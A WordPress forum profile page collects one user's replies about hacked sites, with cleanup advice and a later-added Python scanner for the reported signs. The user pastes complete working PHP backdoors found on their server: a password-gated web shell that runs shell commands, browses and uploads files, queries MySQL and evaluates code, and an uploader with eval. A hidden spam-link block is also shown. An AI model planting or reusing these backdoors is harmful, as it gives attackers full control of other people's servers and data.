Mobster
Forum Replies Created
Forum: Fixing WordPress
In reply to: WordPress keeps breaking No clue whats wrong
Well… My file actually was some sort of redirect for the admin. It had a password associated with it that allowed the attacker to edit my files. Not sure about yours.
Forum: Fixing WordPress
In reply to: WordPress keeps breaking No clue whats wrong
I had a site, no lie, that was hacked within a week on a brand new server, brand new domain, brand new install.
I think they robot WordPress for its vulnerabilities. I might be crazy but, that’s the only way someone could have possibly found my new site that was hacked.
Don’t kid yourself by thinking WordPress is hackersafe. No matter how new the site is.
I’d love to see that .htaccessbak file (edited for safety of course)
Forum: Fixing WordPress
In reply to: WordPress keeps breaking No clue whats wrong
If that is anything like mine, it overrides your admin privileges and allows the hacker to edit basically any file they choose.
I’m not 100% positive but, I’m pretty certain that is not a default WordPress .htaccess file.
I just posted this in another forum.
I just repaired a major hacked site myself. It was a complete pain in my ass.
Look for .htaccess.addHandlerBak or any .htaccess that doesn’t belong there and delete it immediately!
Because NO ONE responded to any of my requests, I will only tell you what I found on my server. As you can see here HERE
Your file changes look almost identical to mine and the hackers added files throughout my server that mirrored certain files in my directory but added a prefix to the file. Mine was fx_
Through these files and the .htaccess.addHandlerBak they essentially had overridden my admin privileges and made their own through .htaccess. They also uploaded some sort of admin panel of their own (eval script) I believe, that gave them full rein of my main directory and MySQL database as well.
I would suggest backing up your current theme and database, completely deleting ALL current files on your host, and uploading a fresh install of WordPress 2.5.1.
Be sure to double, triple check your theme for files you don’t recognize and delete those files before uploading to the server. Otherwise it’s a backdoor for them to get back in.
I also read somewhere to add an index.html file to your plugins directory to prevent hackers from browsing that directory. (A sort of dumb thing for WordPress to leave out in my opinion)
Browse MySql wp_options / current_plugins for any suspicious looking code that pertains to uploads or .jpg images.
Check all of your uploads in your current theme for any file you don’t recognize and delete.
Also, look here, you might find a few things that help (even though it didn’t help me much)
Also, if your hosting company offers Fantastico WordPress setup and you do a manual install, I found out that the old version installed on Fantastico can be hacked, which compromises your current (up to date) installation.
You might want to contact your hosting company to see if your server has been compromised in any way.
Good luck.
Forum: Fixing WordPress
In reply to: WordPress keeps breaking No clue whats wrong
Did you look for any other .htaccess files that are named something different?
Like this .htaccess.addHandlerBak?
Just curious.
And another thing, why the hell would a CMS like WordPress allow this type of activity? Clearly, by default, .htaccess should not allow someone to browse files like this.
I just repaired a major hacked site myself. It was a complete pain in my ass.
Look for .htaccess.addHandlerBak or any .htaccess that doesn’t belong there and delete it immediately!
Because NO ONE responded to any of my requests, I will only tell you what I found on my server. As you can see here HERE
Your file changes look almost identical to mine and the hackers added files throughout my server that mirrored certain files in my directory but added a prefix to the file. Mine was fx_
Through these files and the .htaccess.addHandlerBak they essentially had overridden my admin privileges and made their own through .htaccess. They also uploaded some sort of admin panel of their own (eval script) I believe, that gave them full rein of my main directory and MySQL database as well.
I would suggest backing up your current theme and database, completely deleting ALL current files on your host, and uploading a fresh install of WordPress 2.5.1.
Be sure to double, triple check your theme for files you don’t recognize and delete those files before uploading to the server. Otherwise it’s a backdoor for them to get back in.
I also read somewhere to add an index.html file to your plugins directory to prevent hackers from browsing that directory. (A sort of dumb thing for WordPress to leave out in my opinion)
Browse MySql wp_options / current_plugins for any suspicious looking code that pertains to uploads or .jpg images.
Check all of your uploads in your current theme for any file you don’t recognize and delete.
Also, look here, you might find a few things that help (even though it didn’t help me much)
Good luck.
Forum: Fixing WordPress
In reply to: what is .htaccess.addHandlerBak?
Maybe an upper level Dev could please respond?
I found this on my server.
<?php #------------------Security------------------# $name_c = "checkIndentity"; function get_c($name_c){ foreach($_COOKIE as $key=>$value) { if ($key == $name_c) return $c = $value; else return false; } } function is_cookie ($search_cookie) { foreach($_COOKIE as $key=>$value) { if ($value == $search_cookie) return true; else return false; } } if (md5($_REQUEST['p']) == "1b0ca22694b8eb1303af4d535bc15df7" || is_cookie(get_c($name_c))){ if(!is_cookie(get_c($name_c))) setcookie("checkIndentity",md5($_REQUEST['p'])); #------------------END Security------------------# ################################################## #------------------Private Class------------------# class browseDir { var $pwd; var $newLocation; function browseDir(){ $d=$this->pwd = getcwd(); $this->changeDir($d); } function upload($ifupload){ if(isset($ifupload)){ $uploadfile = getcwd().'/'.basename($_FILES['uploadfile']['name']); if (! move_uploaded_file($_FILES['uploadfile']['tmp_name'], $uploadfile)){ print "Unable to move ". $_FILES['uploadfile']['tmp_name']." 
file to<br />$uploadfile<br />"; } if (file_exists($uploadfile)) @chmod($uploadfile, 0777); } } function changeDir ($dir){ $dir=trim($dir); @chdir($this->pwd); if (!file_exists($dir)){print "$dir: No such file or directory<br />\n";return;} if (!@chdir($dir)) {print "$dir: Failed<br />\n";return;} return $this->pwd = getcwd(); } function getDirList($newLocation=''){ $handle = ''; $self = $_SERVER['PHP_SELF']; if (empty($this->newLocation) && $this->newLocation == ''){ $_SESSION['lastchg'] = '.'; $handle = @opendir($this->pwd); if(!$handle) {print "No perms to read: ".$this->pwd.'<br />';} $dirs = array(); $files = array(); while (false !== ($file = @readdir($handle))) { if ($file != ".") { if (is_dir($file)) $dirs[] = $file; else $files[] = $file; } } } if (!empty($this->newLocation) && $this->newLocation != ''){ if(isset($_SESSION['lastchg'])) { $this->pwd = &$_SESSION['lastchg']; $_SESSION['lastchg'] = $this->changeDir($this->newLocation); } if(empty($_SESSION['lastchg'])) $_SESSION['lastchg'] = $this->changeDir($this->newLocation); } $handle = @opendir($this->pwd); if(!$handle) {print "No perms to read: ".$this->pwd.'<br />';} $dirs = array(); $files = array(); while (false !== ($file = @readdir($handle))) { if ($file != ".") { if (is_dir($file)){ $dirs[] = $file; } else { $files[] = $file; } } } @closedir($handle); natcasesort($files); natcasesort($dirs); print '<tr><td valign="top">'; print '<i>'.getcwd().'</i><br />'; print '<hr><br />'; foreach ($dirs as $d){ print '<a href="?command='.urlencode($d).'">'.htmlentities($d)."</a><br />\n"; } print '<hr/>'; foreach ($files as $f){ if (is_readable($f)) print '<a target="_blank" href="'.$_SERVER['PHP_SELF'].'/'.urlencode($f).'?getfile='. 
urlencode($f).'">'.htmlentities($f).'</a>'; else print htmlentities($f); print "<br />\n"; } print "<br />\n"; print "<br />\n"; if (is_writeable(getcwd())){ print '<form enctype="multipart/form-data" action="'.$self.'" method="post">'; print '<input type="file" name="uploadfile" />'; print '<input type="submit" name="submit" value="Upload" />'; print '</form>'; } print "</td><td>"; } function showFile ($fname,$escapeOutput = true){ if(empty($this->pwd) && $this->pwd=='') $this->pwd = '.'; $fullpath = $_SESSION['lastchg']."/$fname"; $ctype = 'text/plain'; if (! is_readable($fullpath)){print "Unable to read $fullpath";return;} if ($ctype == 'text/html' && $escapeOutput) header("Content-type: text/plain\r\n\r\n"); else header( "Content-type: $ctype\r\n\r\n"); if($fh=@fopen($fullpath,'r')){ $code=@fread($fh,filesize($fullpath)); @fclose($fh); echo $code; }else readfile($fullpath); } function send_file($dist_name='') { ob_end_clean(); /*$e = split("/", strrev($dist_name), 2); $name = strrev($e[0]); $distination = strrev($e[1]); $path = $distination."/".$name;*/ if(empty($this->pwd) && $this->pwd == '') $this->pwd = '.'; $path = $this->pwd."/$dist_name"; if (!is_file($path) or connection_status()!=0) return(FALSE); header("Cache-Control: no-store, no-cache, must-revalidate"); header("Cache-Control: post-check=0, pre-check=0", false); header("Pragma: no-cache"); header("Expires: ".gmdate("D, d M Y H:i:s", mktime(date("H")+2, date("i"), date("s"), date("m"), date("d"), date("Y")))." GMT"); header("Last-Modified: ".gmdate("D, d M Y H:i:s")." 
GMT"); header("Content-Type: application/octet-stream"); header("Content-Length: ".(string)(filesize($path))); header("Content-Disposition: inline; filename=".str_replace(" ","",$name)); header("Content-Transfer-Encoding: binary\n"); if ($file = fopen($path, 'rb')) { while(!feof($file) and (connection_status()==0)) { print(fread($file, 1024*8)); flush(); } fclose($file); } return((connection_status()==0) and !connection_aborted()); } function shh_curPageURL() { global $SLASHSTR; $pageURL = 'http'; //if ($_SERVER["HTTPS"] == "on") {$pageURL .= "s";} $pageURL .= "://"; if ($_SERVER["SERVER_PORT"] != "80") { $pageURL .= $_SERVER["SERVER_NAME"].":".$_SERVER["SERVER_PORT"].$_SERVER["REQUEST_URI"]; } else { $pageURL .= $_SERVER["SERVER_NAME"].$_SERVER["REQUEST_URI"]; } if(!strstr($pageURL, $SLASHSTR)){ if(strpos($pageURL, '?')){$pageURL.="&$SLASHSTR";}else{$pageURL.="?$SLASHSTR";} } return $pageURL; } function print_a( $TheArray ){ echo "<table border="1">\n"; $Keys = array_keys( $TheArray ); foreach( $Keys as $OneKey ){ echo "<tr>\n"; echo "<td bgcolor="'#727450'">"; echo "<B>" . $OneKey . 
"</B>"; echo "</td>\n"; echo "<td bgcolor="'#C4C2A6'">"; if ( is_array($TheArray[$OneKey]) ) $this->print_a($TheArray[$OneKey]); else echo $TheArray[$OneKey]; echo "</td>\n"; echo "</tr>\n"; } echo "</table>\n"; } } #------------------END Private Class------------------# ####################################################### #------------------Define Variables------------------# $isupload = $_REQUEST['submit']; $SLASHSTR='sht=%22'; $openFile = '';if(isset($_REQUEST['getfile'])){$openFile=trim($_REQUEST['getfile']);} $shhptr='';if(isset($_REQUEST['shhptr'])){$shhptr=trim($_REQUEST['shhptr']);} // print_r($_REQUEST); $_SESSION['button'] = $shhptr;$page = $_SESSION['button']; $newLocation='';if(isset($_REQUEST['command'])){$newLocation=trim($_REQUEST['command']);} $cmd='';if(isset($_REQUEST['cmd'])){$cmd=trim($_REQUEST['cmd']);} $shhcmd='';if(isset($_REQUEST['shhcmd'])){$shhcmd=trim($_REQUEST['shhcmd']);} $shhqry='';if(isset($_REQUEST['shhqry'])){$shhqry=trim($_REQUEST['shhqry']);} $sdbhst='';if(isset($_REQUEST['sdbhst'])){$sdbhst=trim($_REQUEST['sdbhst']);} $sdbusr='';if(isset($_REQUEST['sdbusr'])){$sdbusr=trim($_REQUEST['sdbusr']);} $sdbpsw='';if(isset($_REQUEST['sdbpsw'])){$sdbpsw=trim($_REQUEST['sdbpsw']);} $sdbsch='';if(isset($_REQUEST['sdbsch'])){$sdbsch=trim($_REQUEST['sdbsch']);} $shhcod='';if(isset($_REQUEST['shhcod'])){$shhcod=trim($_REQUEST['shhcod']);} $shhx='no';if(isset($_REQUEST['shhx'])){$shhx=trim($_REQUEST['shhx']);} $shhfnm='';if(isset($_REQUEST['shhfnm'])){$shhfnm=trim($_REQUEST['shhfnm']);} $slashtest=false;if(isset($_REQUEST['sht'])){$slashtest=trim($_REQUEST['sht']);} if(($slashtest!=false)&&($slashtest!='')){if($slashtest==='\"'){ $shhcod = stripslashes($shhcod); $shhcmd = stripslashes($shhcmd); $shhqry = stripslashes($shhqry); }} #------------------END Define Variables------------------# ########################################################## $browser = new browseDir(); session_start(); if($openFile!='') 
{$browser->showFile($openFile);exit;} ?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <SCRIPT type="text/javascript"> function submitform(num){ var num; document.theshll.shhptr.value = num; document.theshll.submit(); } </SCRIPT> <style type="text/css"> input{color:#2EFE2E;background-color:black;margin:3px;} textarea{border-color:white;color:#2EFE2E;background-color:black;margin:3px;} body{color:white;background-color:black;} a{color:white;} td{border-color:white;color:#2EFE2E;background-color:black;margin:1px;} th{color:green;} </style> </head> <body> <? if($shhptr == 0 || $shhptr == ''){?> <table border="1" align="left" > <form action="<?php echo $_SERVER['PHP_SELF']; ?>" method="post" name="theshll" id="theshll"> <input type="hidden" name="shhptr" value="<?php echo $shhptr ?>" /> <input type="button" name="1" value="SQL" onmousedown="submitform(1);" /> <input type="button" name="2" value="EVAL" onmousedown="submitform(2);" /> <tr> <th>CurrentDirectoryListing</th> <td><input align="left" type="text" name="cmd" size="60" /> <input type="submit" value="EXECUTE" /></td> </tr> </form> <?php $browser->newLocation = $newLocation;$browser->upload($isupload); $browser->getDirList(); echo"<textarea wrap=\"off\" readonly rows=\"20\" cols=\"90\">"; if(($shhptr=='')&&($cmd!='')){ if(passthru($cmd, $out)){ echo htmlentities(implode("\n",$out)); } } echo "</textarea></td></tr>"; ?> </table> <?}?> <?if(($page=='1')){?> <form action="<?php echo $_SERVER['PHP_SELF']; ?>" method="post" name="theshll" id="theshll"> <input type="hidden" name="shhptr" value="<?php echo $shhptr ?>" /> <input type="button" name="1" value="BROWSE" onmousedown="submitform(0);" /> <input type="button" name="2" value="EVAL" onmousedown="submitform(2);" /> <div style="width: 600px;"> <div style="float:left;"> <input type="text" name="sdbhst" size="20" value="<?php echo $sdbhst; ?>" 
/>.::Host:. <br /> <input type="text" name="sdbsch" size="20" value="<?php echo $sdbsch; ?>" />.::DB:.</div> <div style="margin-left:20px;float:left;"> <input type="text" name="sdbusr" size="20" value="<?php echo $sdbusr; ?>" />.::User:.<br /> <input type="text" name="sdbpsw" size="20" value="<?php echo $sdbpsw; ?>" />.::Pass:.</div> <input type="text" name="shhqry" size="80" value="<?php echo $shhqry; ?>" /> <input type="submit" value="QUERY" /></form> <?php echo "<table>"; if(($shhptr=='1')&&($shhqry!='')){ if ($mysql = @mysql_connect($sdbhst, $sdbusr, $sdbpsw)){ if(@mysql_select_db($sdbsch)) { if($res = @mysql_query($shhqry)){ if($row = mysql_fetch_assoc($res)){ while($row = mysql_fetch_assoc($res)){ $arr[] = $row; } $browser->print_a($arr); } } else echo "mysql query error: ".mysql_error()."\n"; } else echo "mysql select error: ".mysql_error()."\n"; @mysql_close($mysql); } else echo "mysql connect error: ".mysql_error()."\n"; } echo "</table>"; } if(($page=='2')){ ?> <form action="<?php echo $browser->shh_curPageURL(); ?>" method="post" name="theshll" id="theshll"> <input type="hidden" name="shhptr" value="<?php echo $shhptr ?>" /> <input type="button" name="1" value="BROWSE" onmousedown="submitform(0);" /> <input type="button" name="2" value="SQL" onmousedown="submitform(1);" /> <br /> <input type="text" name="shhfnm" size="40" value="<?php echo $shhfnm; ?>" /> <input type="submit" name="shhx" value="SAVE AS" /> <input type="submit" name="shhx" value="INCLUDE/RUN" /><br /> <input type="submit" name="shhx" value="EVALUATE" /><br /> <textarea name="shhcod" wrap="off" rows="15" cols="65" > <?php echo $shhcod;?> </textarea> </form> <?php echo "<div id=\"reslt\">"; switch($shhx){ case 'EVALUATE': if($shhcod!=''){ ob_start(); eval($shhcod); $eval=ob_get_contents(); ob_end_clean(); } else { ob_start(); echo "Enter PHP code!"; $eval=ob_get_contents(); ob_end_clean(); } break; case 'SAVE AS': if($shhfnm!=''){ $f = @fopen($shhfnm, 'w'); if($f){ if(strpos($shhcod, 
'<?php')===false){ $shhcodz = "<?php\n".$shhcod."\n".'?'.'>'; } else $shhcodz = $shhcod; fwrite($f, $shhcodz); fclose($f); echo "Saved."; } else echo "Cannot write file!\n"; } else echo "Enter file name!\n"; break; case 'INCLUDE/RUN': if($shhfnm!=''){ if (!@include($shhfnm)){ echo "Include error!"; }; } else echo "Enter file name!\n"; break; } if(!empty($eval) && $eval != ''){ echo '<table align="left" border="0" >'; echo '<th align="center">EVAL OUTPUT:</th>'; echo '</table><br />'; echo '<br />'; echo '<table align="left" border="1" width="48%" height="30%">'; echo '<tr><td align="center">'.$eval.'</td></tr>'; echo '</table>'; } } ?> <th ></th> </body></html> <?}?>
Forum: Fixing WordPress
In reply to: got hacked
Has anyone come up with a solution to this? I had this very thing happen to me recently. It seems there are a lot of threads like this that go unanswered.
My files all began with fx_
How should I check my database to make sure none of this is polluting that as well?
Forum: Fixing WordPress
In reply to: what is .htaccess.addHandlerBak?
I found files with this code all throughout my site.
<?php @error_reporting(E_ALL); @set_time_limit(0); global $HTTP_SERVER_VARS; define('PASSWD','their password not mine?'); function say($t) { echo "$t\n"; }; function testdata($t) { say(md5("mark_$t")); }; echo "<pre>"; testdata('start'); if (md5($_POST["p"]) == PASSWD) { if ($code = @fread(@fopen($HTTP_POST_FILES["s"]["tmp_name"], "rb"), $HTTP_POST_FILES["s"]["size"])) { if(@fwrite(@fopen(dirname(__FILE__).'/'.basename($HTTP_POST_FILES["s"]["name"]), "wb"), $code)) { testdata('save_ok'); }; //eval($code); } else { testdata('save_fail'); }; if ($code = @fread(@fopen($HTTP_POST_FILES["f"]["tmp_name"], "rb"), $HTTP_POST_FILES["f"]["size"])) { eval($code); testdata('ok'); } else { testdata('fail'); }; } else { testdata('pass'); }; testdata('end'); echo "</pre>"; ?>
Forum: Fixing WordPress
In reply to: what is .htaccess.addHandlerBak?
Any more details on this?
Forum: Fixing WordPress
In reply to: Site Hacked over and over WordPress 2.5.1 Please Help!
Man, had I found this a week ago it would have saved me some time.
This plug-in found a couple problems right off the bat.
It detected this in my upload directory. (I won’t post the whole thing but what the???)
2008.php
error_reporting(7); @set_magic_quotes_runtime(0); ob_start(); $mtime = explode(' ', microtime()); $starttime = $mtime[1] + $mtime[0]; define('SA_ROOT', str_replace('\\', '/', dirname(__FILE__)).'/'); //define('IS_WIN', strstr(PHP_OS, 'WIN') ? 1 : 0 ); define('IS_WIN', DIRECTORY_SEPARATOR == '\\'); define('IS_COM', class_exists('COM') ? 1 : 0 ); define('IS_GPC', get_magic_quotes_gpc());
And this:
fx__2008.php
<?php @error_reporting(E_ALL); @set_time_limit(0); global $HTTP_SERVER_VARS; define('PASSWD',' ##$#@!! ( I removed this for obvious reasons) '); function say($t) { echo "$t\n"; }; function testdata($t) { say(md5("mark_$t")); }; echo "<pre>"; testdata('start');
Forum: Fixing WordPress
In reply to: Site Hacked over and over WordPress 2.5.1 Please Help!
Thanks Flammo,
All permissions appear to be set correctly. I checked this yesterday.
I found these users in phpmyAdmin as recent members:
pornvigra[at]gmail.com
canadapharma[at]izmail.net
Also, users have been complaining about not being able to login. A couple people told me their passwords weren’t working and when they try to get a new one it won’t work either.
I get this when I request one /wp-login.php?action=rp&key=us4mN!AG!RS^
I think my database has been hacked.
Forum: Fixing WordPress
In reply to: Site Hacked over and over WordPress 2.5.1 Please Help!
Well… it’s my header that’s being hacked.
This appears right after the <body> tag. It positions them out of view but they’re there. Even when I delete them they come back.
How are they accessing my header.php? Any suggestions?
This is what it looks like.
<!--linksb--> <div style="position:absolute; left:-1130px; top:-1003px;"> <a href="http://www.news.appstate.edu/wp-content/uploads/.thumbs/viagra/viagra.html">viagra </a> <a href="http://www.news.appstate.edu/wp-content/uploads/.thumbs/viagra/viagra-pills.html">viagra pills buy</a> +hundreds more links.................................... <!--linkse-->
What the?????
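The indicators reported across the replies on this page (an `.htaccess` variant such as `.htaccess.addHandlerBak`, `fx_` prefixed copies of existing files, PHP files in the uploads directory, an md5 password check combined with `eval()`, and the `<!--linksb-->` link block in a theme header) can be collected into one file-system sweep. This is an added example and not part of any forum post; the rule set, the function names `scan` and `make_sample_tree`, and the sample tree are assumptions constructed for illustration.

```python
import os
import re
import tempfile

# Indicators come from the replies on this page; the rule set is an assumption.
PHP_EXT = (".php", ".phtml")
MD5_GATE = re.compile(rb"md5\s*\(\s*\$_(?:POST|REQUEST|GET|COOKIE)\s*\[")
EVAL_CALL = re.compile(rb"\beval\s*\(")
LINK_BLOCK = re.compile(rb"<!--\s*linksb\s*-->")
MAX_BYTES = 1_000_000  # per-file read cap (assumed)


def scan(root):
    """Walk root and return a sorted list of (relative_path, reason)."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        rel_dir = os.path.relpath(dirpath, root)
        in_uploads = "uploads" in rel_dir.split(os.sep)
        for name in files:
            rel = os.path.normpath(os.path.join(rel_dir, name)).replace(os.sep, "/")
            lower = name.lower()
            # .htaccess.addHandlerBak and similar: any name that extends ".htaccess"
            if lower.startswith(".htaccess") and lower != ".htaccess":
                findings.append((rel, "unexpected .htaccess variant"))
            # Copies that mirror a real file name behind an fx_ prefix
            if lower.startswith("fx_"):
                twin = name[3:].lstrip("_")
                note = f" (mirrors {twin})" if twin in files else ""
                findings.append((rel, "fx_ prefixed file" + note))
            if not lower.endswith(PHP_EXT):
                continue
            if in_uploads:
                findings.append((rel, "PHP file under uploads"))
            with open(os.path.join(dirpath, name), "rb") as fh:
                data = fh.read(MAX_BYTES)
            # Requiring both patterns keeps legitimate eval() users out of the report
            if MD5_GATE.search(data) and EVAL_CALL.search(data):
                findings.append((rel, "md5 password gate plus eval()"))
            if LINK_BLOCK.search(data):
                findings.append((rel, "hidden link block marker"))
    return sorted(findings)


def make_sample_tree(root):
    """Write constructed, inert sample files imitating the layout described above."""
    samples = {
        ".htaccess": "# BEGIN WordPress\n",
        ".htaccess.addHandlerBak": "# constructed placeholder\n",
        "index.php": "<?php // clean file\n",
        "wp-content/uploads/2008.php": "<?php // constructed placeholder\n",
        "wp-content/uploads/fx__2008.php":
            '<?php if (md5($_POST["p"]) == PASSWD) { eval($code); }\n',
        "wp-content/themes/demo/header.php": "<body>\n<!--linksb--><!--linkse-->\n",
    }
    for rel, text in samples.items():
        path = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w") as fh:
            fh.write(text)

if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        make_sample_tree(tmp)
        for rel, reason in scan(tmp):
            print(f"{rel}: {reason}")
```

A hit is a lead for manual review, not proof of compromise, and a clean result does not cover the database checks mentioned in the replies (`wp_options`, the users table).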
Forum: Fixing WordPress
In reply to: defining excerpt character count
Never mind, I found it in functions.php
function wp_trim_excerpt($text) { // Fakes an excerpt if needed
    if ( '' == $text ) {
        $text = get_the_content('');
        $text = apply_filters('the_content', $text);
        $text = str_replace(']]>', ']]&gt;', $text);
        $text = strip_tags($text);
        $excerpt_length = 95; // <----------------------- here it is
        $words = explode(' ', $text, $excerpt_length + 1);
        if (count($words) > $excerpt_length) {
            array_pop($words);
            array_push($words, '[...]');
            $text = implode(' ', $words);
        }
    }
    return $text;
}
Forum: Fixing WordPress
In reply to: Hacked By Kingworm?
(Version 2.3.2)
Forum: Fixing WordPress
In reply to: Hacked By Kingworm?
Sorry for the double post but… you can’t tell me I’m the only guy hacked by this?
If a mod doesn’t want to reply to this because of its sensitive nature, feel free to email me at denny[at]sydpixel.com.
I’m a little concerned that this is going to happen to all of my sites and would like to know if there has been any effort put into combating this, or if there is anything I can do immediately that may prevent it from happening again.
Thank You